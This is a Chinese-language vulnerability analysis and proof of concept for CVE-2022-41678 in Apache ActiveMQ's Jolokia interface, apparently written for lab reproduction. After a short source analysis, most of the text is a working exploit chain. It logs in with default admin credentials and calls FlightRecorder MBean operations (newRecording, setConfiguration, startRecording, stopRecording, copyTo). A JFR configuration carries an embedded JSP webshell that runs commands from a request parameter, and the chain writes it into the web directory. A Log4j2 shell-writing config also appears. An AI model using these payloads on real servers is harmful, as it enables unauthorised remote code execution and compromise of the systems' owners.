1. 漏洞概述
漏洞编号:CVE-2022-41678
漏洞类型:远程代码执行(RCE)
CVSS评分:9.8(Critical)
影响组件:Apache ActiveMQ Jolokia HTTP接口
攻击复杂度:低(需基础认证)
漏洞本质:JMX MBean操作滥用导致的任意文件写入
2. 影响版本分析
| 版本分支 | 受影响版本 | 安全版本 | 修复提交 |
|---|---|---|---|
| 5.16.x | < 5.16.6 | ≥5.16.6 | a3d8f02 |
| 5.17.x | 5.17.0-5.17.3 | ≥5.17.4 | b4e1c1d |
| 6.x | 无影响 | ≥6.0.0 | 架构重构 |
3. 深度源码分析
3.1 Jolokia 服务暴露(入口点)
关键文件:
activemq-web-console/src/main/webapp/WEB-INF/jetty.xml
<!-- 漏洞配置:未启用安全策略 -->
<bean class="org.eclipse.jetty.servlet.ServletHolder">
<property name="name" value="jolokia"/>
<property name="servlet">
<bean class="org.jolokia.http.AgentServlet">
<!-- 缺失安全配置 -->
<!-- 应添加:<property name="policyLocation" value="file:${activemq.conf}/jolokia-access.xml"/> -->
</bean>
</property>
</bean>安全缺陷:
默认未加载jolokia-access.xml策略文件
允许未授权访问/api/jolokia/*端点
未实现CSRF防护
3.2 FlightRecorderMXBean 滥用(JDK 11+)
调用链分析:
1.创建记录
POST /api/jolokia HTTP/1.1
{
"type": "EXEC",
"mbean": "jdk.management.jfr:type=FlightRecorder",
"operation": "newRecording",
"arguments": []
}2.注入恶意配置
// 伪代码:通过setConfiguration注入JSP
String jspPayload = "<%@ page import=\"java.util.*,java.io.*\"%><% if(request.getParameter(\"cmd\")!=null) { Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); ... } %>";
jfrMXBean.setConfiguration(recordingId, jspPayload);3.文件写入
// JDK源码漏洞点:jdk.management.jfr.FlightRecorderMXBeanImpl
public void copyTo(long recordingId, String path) throws IOException {
// 无路径校验(CWE-22)
Recording recording = findRecording(recordingId);
recording.dump(path); // 可写入任意路径
}路径穿越示例:
../../webapps/admin/shell.jsp
3.3 LoggerContextAdminMBean 滥用(Log4j2)
攻击流程:
获取Log4j上下文MBean名称
GET /api/jolokia/list HTTP/1.1
1.动态修改配置
<!-- 恶意Log4j2配置 -->
<Configuration>
<Appenders>
<File name="hacked" fileName="webapps/admin/shell.jsp">
<PatternLayout pattern="<%%><%=1+2%>"/>
</File>
</Appenders>
</Configuration>2.通过setConfigText加载
// org.apache.logging.log4j.core.jmx.LoggerContextAdmin
public void setConfigText(String configText) {
// 无内容过滤(CWE-94)
Configurator.reconfigure(configText);
}4. 漏洞复现(PoC)
1.环境搭建(vul靶场)
2.利用步骤
(1).管理员登录(账号admin,密码admin)
(2).访问/api/jolokia/list(要加上源地址Origin:http://your-ip)
(3). 新增记录newRecording,获取value值
{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "newRecording", "arguments": []}
加上Content-Type: application/json,下面一样
(4).调用setConfiguration构造包含WebShell的配置文件
{"type": "exec", "mbean": "jdk.management.jfr:type=FlightRecorder", "operation": "setConfiguration", "arguments": [1,"<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<configuration version=\"2.0\" label=\"Continuous\" description=\"Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead.\" provider=\"Oracle\">
<event name=\"jdk.ThreadAllocationStatistics\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\"><![CDATA[||| (<% Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));
out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), \"utf-8\")); %>) |||]]></setting>
</event>
<event name=\"jdk.ClassLoadingStatistics\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">1000 ms</setting>
</event>
<event name=\"jdk.ClassLoaderStatistics\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.JavaThreadStatistics\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">1000 ms</setting>
</event>
<event name=\"jdk.ThreadStart\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ThreadEnd\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.ThreadSleep\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"synchronization-threshold\">20 ms</setting>
</event>
<event name=\"jdk.ThreadPark\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"synchronization-threshold\">20 ms</setting>
</event>
<event name=\"jdk.JavaMonitorEnter\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"synchronization-threshold\">20 ms</setting>
</event>
<event name=\"jdk.JavaMonitorWait\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"synchronization-threshold\">20 ms</setting>
</event>
<event name=\"jdk.JavaMonitorInflate\">
<setting name=\"enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"synchronization-threshold\">20 ms</setting>
</event>
<event name=\"jdk.BiasedLockRevocation\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.BiasedLockSelfRevocation\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.BiasedLockClassRevocation\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.ReservedStackActivation\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ClassLoad\">
<setting name=\"enabled\" control=\"class-loading-enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.ClassDefine\">
<setting name=\"enabled\" control=\"class-loading-enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ClassUnload\">
<setting name=\"enabled\" control=\"class-loading-enabled\">false</setting>
</event>
<event name=\"jdk.JVMInformation\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.InitialSystemProperty\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.ExecutionSample\">
<setting name=\"enabled\" control=\"method-sampling-enabled\">true</setting>
<setting name=\"period\" control=\"method-sampling-java-interval\">20 ms</setting>
</event>
<event name=\"jdk.NativeMethodSample\">
<setting name=\"enabled\" control=\"method-sampling-enabled\">true</setting>
<setting name=\"period\" control=\"method-sampling-native-interval\">20 ms</setting>
</event>
<event name=\"jdk.SafepointBegin\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.SafepointStateSynchronization\">
<setting name=\"enabled\">false</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.SafepointWaitBlocked\">
<setting name=\"enabled\">false</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.SafepointCleanup\">
<setting name=\"enabled\">false</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.SafepointCleanupTask\">
<setting name=\"enabled\">false</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.SafepointEnd\">
<setting name=\"enabled\">false</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.ExecuteVMOperation\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.Shutdown\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ThreadDump\">
<setting name=\"enabled\" control=\"thread-dump-enabled\">true</setting>
<setting name=\"period\" control=\"thread-dump-interval\">everyChunk</setting>
</event>
<event name=\"jdk.IntFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.UnsignedIntFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.LongFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.UnsignedLongFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.DoubleFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.BooleanFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.StringFlag\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.IntFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.UnsignedIntFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.LongFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.UnsignedLongFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.DoubleFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.BooleanFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.StringFlagChanged\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.ObjectCount\">
<setting name=\"enabled\" control=\"memory-profiling-enabled-all\">false</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.GCConfiguration\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.GCHeapConfiguration\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.YoungGenerationConfiguration\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.GCTLABConfiguration\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.GCSurvivorConfiguration\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.ObjectCountAfterGC\">
<setting name=\"enabled\">false</setting>
</event>
<event name=\"jdk.GCHeapSummary\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.PSHeapSummary\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1HeapSummary\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.MetaspaceSummary\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.MetaspaceGCThreshold\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.MetaspaceAllocationFailure\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.MetaspaceOOM\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.MetaspaceChunkFreeListSummary\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.GarbageCollection\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.ParallelOldGarbageCollection\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.YoungGarbageCollection\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.OldGarbageCollection\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.G1GarbageCollection\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhasePause\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhasePauseLevel1\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhasePauseLevel2\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhasePauseLevel3\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhasePauseLevel4\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCPhaseConcurrent\">
<setting name=\"enabled\" control=\"gc-enabled-all\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.GCReferenceStatistics\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.PromotionFailed\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.EvacuationFailed\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.EvacuationInformation\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1MMU\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1EvacuationYoungStatistics\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1EvacuationOldStatistics\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1BasicIHOP\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1AdaptiveIHOP\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.PromoteObjectInNewPLAB\">
<setting name=\"enabled\" control=\"memory-profiling-enabled-medium\">false</setting>
</event>
<event name=\"jdk.PromoteObjectOutsidePLAB\">
<setting name=\"enabled\" control=\"memory-profiling-enabled-medium\">false</setting>
</event>
<event name=\"jdk.ConcurrentModeFailure\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.AllocationRequiringGC\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.TenuringDistribution\">
<setting name=\"enabled\" control=\"gc-enabled-normal\">true</setting>
</event>
<event name=\"jdk.G1HeapRegionInformation\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.G1HeapRegionTypeChange\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
</event>
<event name=\"jdk.ShenandoahHeapRegionInformation\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.ShenandoahHeapRegionStateChange\">
<setting name=\"enabled\" control=\"gc-enabled-all\">false</setting>
</event>
<event name=\"jdk.OldObjectSample\">
<setting name=\"enabled\" control=\"memory-leak-detection-enabled\">true</setting>
<setting name=\"stackTrace\" control=\"memory-leak-detection-stack-trace\">false</setting>
<setting name=\"cutoff\" control=\"memory-leak-detection-cutoff\">0 ns</setting>
</event>
<event name=\"jdk.CompilerConfiguration\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.CompilerStatistics\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">1000 ms</setting>
</event>
<event name=\"jdk.Compilation\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"threshold\" control=\"compiler-compilation-threshold\">1000 ms</setting>
</event>
<event name=\"jdk.CompilerPhase\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"threshold\" control=\"compiler-phase-threshold\">60 s</setting>
</event>
<event name=\"jdk.CompilationFailure\">
<setting name=\"enabled\" control=\"compiler-enabled-failure\">false</setting>
</event>
<event name=\"jdk.CompilerInlining\">
<setting name=\"enabled\" control=\"compiler-enabled-failure\">false</setting>
</event>
<event name=\"jdk.CodeSweeperConfiguration\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.CodeSweeperStatistics\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.SweepCodeCache\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"threshold\" control=\"compiler-sweeper-threshold\">100 ms</setting>
</event>
<event name=\"jdk.CodeCacheConfiguration\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.CodeCacheStatistics\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.CodeCacheFull\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
</event>
<event name=\"jdk.OSInformation\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.VirtualizationInformation\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.CPUInformation\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.ThreadContextSwitchRate\">
<setting name=\"enabled\" control=\"compiler-enabled\">true</setting>
<setting name=\"period\">10 s</setting>
</event>
<event name=\"jdk.CPULoad\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">1000 ms</setting>
</event>
<event name=\"jdk.ThreadCPULoad\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">10 s</setting>
</event>
<event name=\"jdk.CPUTimeStampCounter\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.SystemProcess\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">endChunk</setting>
</event>
<event name=\"jdk.NetworkUtilization\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">5 s</setting>
</event>
<event name=\"jdk.InitialEnvironmentVariable\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">beginChunk</setting>
</event>
<event name=\"jdk.PhysicalMemory\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.ObjectAllocationInNewTLAB\">
<setting name=\"enabled\" control=\"memory-profiling-enabled-medium\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ObjectAllocationOutsideTLAB\">
<setting name=\"enabled\" control=\"memory-profiling-enabled-medium\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.NativeLibrary\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">everyChunk</setting>
</event>
<event name=\"jdk.ModuleRequire\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">endChunk</setting>
</event>
<event name=\"jdk.ModuleExport\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">endChunk</setting>
</event>
<event name=\"jdk.FileForce\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"file-io-threshold\">20 ms</setting>
</event>
<event name=\"jdk.FileRead\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"file-io-threshold\">20 ms</setting>
</event>
<event name=\"jdk.FileWrite\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"file-io-threshold\">20 ms</setting>
</event>
<event name=\"jdk.SocketRead\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"socket-io-threshold\">20 ms</setting>
</event>
<event name=\"jdk.SocketWrite\">
<setting name=\"enabled\">true</setting>
<setting name=\"stackTrace\">true</setting>
<setting name=\"threshold\" control=\"socket-io-threshold\">20 ms</setting>
</event>
<event name=\"jdk.SecurityPropertyModification\">
<setting name=\"enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.TLSHandshake\">
<setting name=\"enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.X509Validation\">
<setting name=\"enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.X509Certificate\">
<setting name=\"enabled\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.JavaExceptionThrow\">
<setting name=\"enabled\" control=\"enable-exceptions\">false</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.JavaErrorThrow\">
<setting name=\"enabled\" control=\"enable-errors\">true</setting>
<setting name=\"stackTrace\">true</setting>
</event>
<event name=\"jdk.ExceptionStatistics\">
<setting name=\"enabled\">true</setting>
<setting name=\"period\">1000 ms</setting>
</event>
<event name=\"jdk.ActiveRecording\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.ActiveSetting\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.DataLoss\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.DumpReason\">
<setting name=\"enabled\">true</setting>
</event>
<event name=\"jdk.ZPageAllocation\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.ZThreadPhase\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">0 ms</setting>
</event>
<event name=\"jdk.ZStatisticsCounter\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<event name=\"jdk.ZStatisticsSampler\">
<setting name=\"enabled\">true</setting>
<setting name=\"threshold\">10 ms</setting>
</event>
<control>
<selection name=\"gc-level\" default=\"detailed\" label=\"Garbage Collector\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Normal\" name=\"detailed\">normal</option>
<option label=\"All\" name=\"all\">all</option>
</selection>
<condition name=\"gc-enabled-normal\" true=\"true\" false=\"false\">
<or>
<test name=\"gc-level\" operator=\"equal\" value=\"normal\"/>
<test name=\"gc-level\" operator=\"equal\" value=\"all\"/>
</or>
</condition>
<condition name=\"gc-enabled-all\" true=\"true\" false=\"false\">
<test name=\"gc-level\" operator=\"equal\" value=\"all\"/>
</condition>
<selection name=\"memory-profiling\" default=\"off\" label=\"Memory Profiling\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Object Allocation and Promotion\" name=\"medium\">medium</option>
<option label=\"All, including Heap Statistics (May cause long full GCs)\" name=\"all\">all</option>
</selection>
<condition name=\"memory-profiling-enabled-medium\" true=\"true\" false=\"false\">
<or>
<test name=\"memory-profiling\" operator=\"equal\" value=\"medium\"/>
<test name=\"memory-profiling\" operator=\"equal\" value=\"all\"/>
</or>
</condition>
<condition name=\"memory-profiling-enabled-all\" true=\"true\" false=\"false\">
<test name=\"memory-profiling\" operator=\"equal\" value=\"all\"/>
</condition>
<selection name=\"compiler-level\" default=\"normal\" label=\"Compiler\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Normal\" name=\"normal\">normal</option>
<option label=\"Detailed\" name=\"detailed\">detailed</option>
<option label=\"All\" name=\"all\">all</option>
</selection>
<condition name=\"compiler-enabled\" true=\"false\" false=\"true\">
<test name=\"compiler-level\" operator=\"equal\" value=\"off\"/>
</condition>
<condition name=\"compiler-enabled-failure\" true=\"true\" false=\"false\">
<or>
<test name=\"compiler-level\" operator=\"equal\" value=\"detailed\"/>
<test name=\"compiler-level\" operator=\"equal\" value=\"all\"/>
</or>
</condition>
<condition name=\"compiler-sweeper-threshold\" true=\"0 ms\" false=\"100 ms\">
<test name=\"compiler-level\" operator=\"equal\" value=\"all\"/>
</condition>
<condition name=\"compiler-compilation-threshold\" true=\"1000 ms\">
<test name=\"compiler-level\" operator=\"equal\" value=\"normal\"/>
</condition>
<condition name=\"compiler-compilation-threshold\" true=\"100 ms\">
<test name=\"compiler-level\" operator=\"equal\" value=\"detailed\"/>
</condition>
<condition name=\"compiler-compilation-threshold\" true=\"0 ms\">
<test name=\"compiler-level\" operator=\"equal\" value=\"all\"/>
</condition>
<condition name=\"compiler-phase-threshold\" true=\"60 s\">
<test name=\"compiler-level\" operator=\"equal\" value=\"normal\"/>
</condition>
<condition name=\"compiler-phase-threshold\" true=\"10 s\">
<test name=\"compiler-level\" operator=\"equal\" value=\"detailed\"/>
</condition>
<condition name=\"compiler-phase-threshold\" true=\"0 s\">
<test name=\"compiler-level\" operator=\"equal\" value=\"all\"/>
</condition>
<selection name=\"method-sampling-interval\" default=\"normal\" label=\"Method Sampling\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Normal\" name=\"normal\">normal</option>
<option label=\"High\" name=\"high\">high</option>
<option label=\"Ludicrous (High Overhead)\" name=\"ludicrous\">ludicrous</option>
</selection>
<condition name=\"method-sampling-java-interval\" true=\"999 d\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"off\"/>
</condition>
<condition name=\"method-sampling-java-interval\" true=\"20 ms\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"normal\"/>
</condition>
<condition name=\"method-sampling-java-interval\" true=\"10 ms\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"high\"/>
</condition>
<condition name=\"method-sampling-java-interval\" true=\"1 ms\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"ludicrous\"/>
</condition>
<condition name=\"method-sampling-native-interval\" true=\"999 d\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"off\"/>
</condition>
<condition name=\"method-sampling-native-interval\" true=\"20 ms\">
<or>
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"normal\"/>
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"high\"/>
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"ludicrous\"/>
</or>
</condition>
<condition name=\"method-sampling-enabled\" true=\"false\" false=\"true\">
<test name=\"method-sampling-interval\" operator=\"equal\" value=\"off\"/>
</condition>
<selection name=\"thread-dump-interval\" default=\"normal\" label=\"Thread Dump\">
<option label=\"Off\" name=\"off\">999 d</option>
<option label=\"At least Once\" name=\"normal\">everyChunk</option>
<option label=\"Every 60 s\" name=\"everyMinute\">60 s</option>
<option label=\"Every 10 s\" name=\"everyTenSecond\">10 s</option>
<option label=\"Every 1 s\" name=\"everySecond\">1 s</option>
</selection>
<condition name=\"thread-dump-enabled\" true=\"false\" false=\"true\">
<test name=\"thread-dump-interval\" operator=\"equal\" value=\"999 d\"/>
</condition>
<selection name=\"exception-level\" default=\"errors\" label=\"Exceptions\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Errors Only\" name=\"errors\">errors</option>
<option label=\"All Exceptions, including Errors\" name=\"all\">all</option>
</selection>
<condition name=\"enable-errors\" true=\"true\" false=\"false\">
<or>
<test name=\"exception-level\" operator=\"equal\" value=\"errors\"/>
<test name=\"exception-level\" operator=\"equal\" value=\"all\"/>
</or>
</condition>
<condition name=\"enable-exceptions\" true=\"true\" false=\"false\">
<test name=\"exception-level\" operator=\"equal\" value=\"all\"/>
</condition>
<selection name=\"memory-leak-detection\" default=\"minimal\" label=\"Memory Leak Detection\">
<option label=\"Off\" name=\"off\">off</option>
<option label=\"Object Types\" name=\"minimal\">minimal</option>
<option label=\"Object Types + Allocation Stack Traces\" name=\"medium\">medium</option>
<option label=\"Object Types + Allocation Stack Traces + Path to GC Root\" name=\"full\">full</option>
</selection>
<condition name=\"memory-leak-detection-enabled\" true=\"false\" false=\"true\">
<test name=\"memory-leak-detection\" operator=\"equal\" value=\"off\"/>
</condition>
<condition name=\"memory-leak-detection-stack-trace\" true=\"true\" false=\"false\">
<or>
<test name=\"memory-leak-detection\" operator=\"equal\" value=\"medium\"/>
<test name=\"memory-leak-detection\" operator=\"equal\" value=\"full\"/>
</or>
</condition>
<condition name=\"memory-leak-detection-cutoff\" true=\"1 h\" false=\"0 ns\">
<test name=\"memory-leak-detection\" operator=\"equal\" value=\"full\"/>
</condition>
<text name=\"synchronization-threshold\" label=\"Synchronization Threshold\" contentType=\"timespan\" minimum=\"0 s\">20 ms</text>
<text name=\"file-io-threshold\" label=\"File I/O Threshold\" contentType=\"timespan\" minimum=\"0 s\">20 ms</text>
<text name=\"socket-io-threshold\" label=\"Socket I/O Threshold\" contentType=\"timespan\" minimum=\"0 s\">20 ms</text>
<flag name=\"class-loading-enabled\" label=\"Class Loading\">false</flag>
</control>
</configuration>"]}
(5).开始录制
{"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"startRecording","arguments":[1]}
(6).结束录制
{"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"stopRecording","arguments":[1]}
(7).使用copyTo,导出到web目录
{"type":"exec","mbean":"jdk.management.jfr:type=FlightRecorder","operation":"copyTo","arguments":[1,"./webapps/admin/test.jsp"]}
